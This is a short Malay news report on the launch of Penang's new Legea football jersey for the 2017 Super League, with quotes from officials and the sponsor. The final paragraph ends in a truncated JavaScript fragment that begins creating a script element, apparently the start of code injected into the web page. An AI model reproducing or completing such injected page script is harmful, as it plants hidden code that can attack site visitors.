Jersi baharu Pulau Pinang harungi Liga Super 2017 dilancar

DATUK KERAMAT – Ketua Menteri Y.A.B. Tuan Lim Guan Eng baru-baru ini melancarkan jersi baharu Pasukan Bola Sepak Pulau Pinang berjenama Legea dari Itali, bagi mengharungi saingan Liga Super 2017.

Turut serta, Timbalan Ketua Menteri I, Dato’ Mohd. Rashid Hasnon; Presiden Bola Sepak Pulau Pinang (FAP), Dato’ Seri Nazir Ariff Munshir Ariff; Pengurus Persatuan Pasukan Bola Sepak Pulau Pinang (FAP), Zairil Khir Johari yang juga
Ahli Parlimen Bukit Bendera serta Pengarah Urusan Legea Ke Asia Tengah, Azman Mohd.

Azman ketika ditemui berkata, Pulau Pinang dipilih untuk ditaja oleh Legea berdasarkan faktor sejarah kehebatan bola sepak negeri ini.

Manakala, Nazir Ariff pula menyatakan bahawa jenama tersebut diterima berdasarkan pakej yang dikemukakan adalah lebih baik berbanding jenama-jenama lain.var d=document;var s=d.createElement(‘script’);